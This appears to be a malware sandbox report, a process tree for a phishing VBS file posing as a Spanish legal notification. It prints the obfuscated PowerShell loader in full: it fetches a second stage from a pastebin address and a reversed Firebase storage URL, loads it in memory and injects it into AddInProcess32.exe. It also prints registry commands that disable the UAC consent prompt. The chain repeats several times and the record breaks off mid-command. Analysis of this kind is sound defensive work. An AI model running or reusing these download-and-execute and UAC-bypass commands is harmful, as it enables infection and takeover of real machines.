[system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5428
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1764
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                            4⤵
                                              PID:3280
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5716
                                      • C:\Windows\System32\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
                                        1⤵
                                        • Checks computer location settings
                                        PID:2024
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
                                          2⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2336
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
                                            3⤵
                                            • Blocklisted process makes network request
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious use of SetThreadContext
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2456
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5236
                                      • C:\Windows\System32\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
                                        1⤵
                                        • Checks computer location settings
                                        PID:5272
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
                                          2⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2600
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
                                            3⤵
                                            • Blocklisted process makes network request
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious use of SetThreadContext
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1212
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5568
                                      • C:\Windows\SysWOW64\DllHost.exe
                                        C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                        1⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5912
                                        • C:\Windows\SysWOW64\mshta.exe
                                          mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"", 0, true:close")
                                          2⤵
                                          • Checks computer location settings
                                          • System Location Discovery: System Language Discovery
                                          PID:2704
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                            3⤵
                                            • UAC bypass
                                            • System Location Discovery: System Language Discovery
                                            • Modifies registry key
                                            PID:5232
                                        • C:\Windows\SysWOW64\mshta.exe
                                          mshta vbscript:Execute("CreateObject(ChrW(87) + ChrW(83) + ChrW(99) + ChrW(114) + ChrW(105) + ChrW(112) + ChrW(116) + ChrW(46) + ChrW(83) + ChrW(104) + ChrW(101) + ChrW(108) + ChrW(108)).Run ""powershell.exe Stop-Process -Name 'cmstp'"", 0, true:close")
                                          2⤵
                                          • Checks computer location settings
                                          • System Location Discovery: System Language Discovery
                                          PID:1012
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Stop-Process -Name 'cmstp'
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3492
                                      • C:\Windows\System32\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
                                        1⤵
                                        • Checks computer location settings
                                        PID:4964
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
                                          2⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5160
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
                                            3⤵
                                            • Blocklisted process makes network request
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious use of SetThreadContext
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6096
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1444
                                      • C:\Windows\System32\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
                                        1⤵
                                        • Checks computer location settings
                                        PID:1880
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 